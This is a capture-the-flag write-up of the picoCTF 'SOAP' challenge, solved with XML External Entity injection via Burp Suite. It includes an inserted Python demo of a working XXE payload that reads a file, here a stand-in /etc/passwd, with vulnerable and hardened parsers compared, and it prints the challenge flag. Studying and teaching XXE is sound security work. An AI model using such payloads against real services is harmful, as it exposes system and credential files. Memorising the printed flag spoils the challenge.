Web Exploitation: SOAP
Author: Geoffrey Njogu
Description
The web project was rushed and no security assessment was done. Can you read the /etc/passwd file?
Hints: XML External Entity Injection
After reading the problem and the hint it was very clear that we need to do something about XXE injection, so I researched XXE injection and also XML files using ChatGPT.
This is the information provided by ChatGPT.
What is XXE Injection?
XXE injection occurs when an application parses XML input and does not properly restrict XML entities. An attacker can craft malicious XML that exploits this to retrieve sensitive files, reach internal network services, conduct denial-of-service (DoS) attacks or, in certain server configurations, execute code.
An external entity lets an XML document reference external resources such as files or URLs. If the parser resolves these references, they can be exploited to read local files or network resources.
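To make the mechanism concrete, here is an added example (my code, not part of the original write-up or of the challenge) that runs the classic file-reading payload through Python's standard-library SAX parser twice: once with external general entities enabled, which is how a vulnerable service behaves, and once with the default, hardened setting. The secret file is a constructed stand-in for /etc/passwd written to a temporary directory; the element names, the entity name xxe and the DataCollector handler are my own.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for /etc/passwd so the demo never touches the real file.
SECRET = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)


def xxe_document(path):
    """The classic payload: the DTD declares an external general entity whose
    SYSTEM identifier is a file URL, and the body references it in a field
    that the application will echo back."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE root [\n"
        f'  <!ENTITY xxe SYSTEM "file://{path}">\n'
        "]>\n"
        "<root><data>&xxe;</data></root>\n"
    )


class DataCollector(ContentHandler):
    """Collects the text of <data>, standing in for an endpoint that reflects a field."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self._parts = []

    def startElement(self, name, attrs):
        if name == "data":
            self._inside = True

    def endElement(self, name):
        if name == "data":
            self._inside = False

    def characters(self, content):
        # Text substituted from the external entity arrives here too.
        if self._inside:
            self._parts.append(content)

    @property
    def text(self):
        return "".join(self._parts)


def parse_data(xml_text, resolve_external_entities):
    """Parse with the stdlib SAX/expat reader. feature_external_ges decides
    whether external general entities are fetched and substituted. Python has
    defaulted it to False since 3.7.1; an application (or a library it uses)
    that turns it on re-creates the bug the challenge exploits. Other parsers
    need the equivalent switch, e.g. lxml's XMLParser(resolve_entities=False)
    or the defusedxml wrappers."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = DataCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode()))
    return handler.text


def demo():
    """Run the same payload through a vulnerable and a hardened parser."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "passwd")
        with open(secret_path, "w") as fh:
            fh.write(SECRET)
        doc = xxe_document(secret_path)
        return {
            "vulnerable": parse_data(doc, resolve_external_entities=True),
            "hardened": parse_data(doc, resolve_external_entities=False),
        }


if __name__ == "__main__":
    for mode, text in demo().items():
        print(f"{mode}: {text!r}")
```

The vulnerable run returns the whole secret file as the text of `<data>`; the hardened run returns an empty string because the entity reference is simply not expanded. Note that the file is read with the parser's own privileges, so anything the web application's user can open is fair game, which is why /etc/passwd is only the proof and not the limit.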
Problem Description
- The application is a web project, and no security assessments were performed, leaving it vulnerable to exploitation.
- The challenge is to read the /etc/passwd file, a common target in CTFs as it contains user account information on Linux systems.
The given hint ("XML External Entity Injection") implies that the application processes XML data insecurely, and we can exploit this to read files.
After this I checked the website given by picoCTF and read the source code to see if there was any hidden flag or hint.
Unfortunately I didn't find anything. So the next thing I did was open the page again to see whether the given buttons were working, because if the buttons are clicked they could send some information to the backend in the form of XML.
After clicking the first button we can see that some information is displayed on the portal.
After clicking the second button we can see that some information is displayed on the portal.
Now I researched how to do XXE injection using Burp Suite and came across a very good blog post by PortSwigger, then copied the payload from the blog and opened Burp Suite.
https://portswigger.net/web-security/xxe
I saw a POST request in the HTTP history in which XML was sent with some data.
I sent this request to Repeater, added my own XML payload taken from the blog, and sent the request to the website.
And I found the flag.
picoCTF{XML_3xtern@l_3nt1t1ty_55662c16}
Key Takeaways
This challenge really highlighted several important lessons:
For Developers:
- Never rush security assessments, even for internal projects
- Disable DTD and external entity resolution in the XML parser unless they are genuinely needed; this is the fix that actually removes XXE, and most parsers need an explicit setting for it
- Validate XML input (for example against a schema) as a second layer, but do not rely on sanitizing it
- Implement proper input validation at multiple layers
For Security Researchers:
- Understanding the application's functionality is crucial before attempting exploitation
- Tools like Burp Suite are invaluable for analyzing and manipulating web requests
- Reading documentation (like PortSwigger's guides) can provide excellent payload examples
- Sometimes the most straightforward approach works best
Real-World Impact: XXE vulnerabilities aren't just CTF curiosities - they're found in production applications regularly. They can cause sensitive file disclosure, server-side request forgery (SSRF), and even remote code execution in certain situations. Proper XML handling is therefore an important security concern.
The ease with which this exploit was achieved also illustrates why security must never be an afterthought. A single parser setting left at an unsafe value allowed arbitrary files to be read with the web application's privileges, illustrating how a small vulnerability can have major repercussions.
This challenge was an excellent hands-on introduction to XML security concerns and drove home the necessity of rigorous security testing in web application development.